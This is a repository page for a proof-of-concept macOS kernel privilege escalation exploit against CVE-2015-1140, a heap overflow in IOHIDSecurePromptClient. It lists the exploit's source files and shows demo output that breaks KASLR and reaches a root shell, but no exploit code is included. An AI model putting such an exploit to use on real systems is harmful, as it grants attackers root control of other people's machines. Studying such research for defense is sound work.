xnu local privilege escalation via cve-2015-1140 IOHIDSecurePromptClient injectStringGated heap overflow | poc||gtfo
Objective-C C Makefile
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
Makefile
README.txt
import.h
lsym.h
lsym.m
lsym_gadgets.h
lsym_payload.m
lsym_priv.h
lsym_priv.m
main.m
patch.c
unpatch.c

README.txt

~vpwn by qwertyoruiop

generic xnu heap overflow exploitation.


demo output:

$ ./pwn
[i] Preparing payload...
[i] broke out of kaslr, kaslr_slide = 0000000001a00000
[+] Payload successfully crafted.
[i] Manipulating the heap...
[i] Exploit loaded.
[+] got r00t
sh-3.2# uname -a
Darwin qwertyoruiops-iMac.local 14.3.0 Darwin Kernel Version 14.3.0: Sat Mar  7 14:01:18 PST 2015; root:xnu-2782.20.39.0.1~1/RELEASE_X86_64 x86_64
sh-3.2#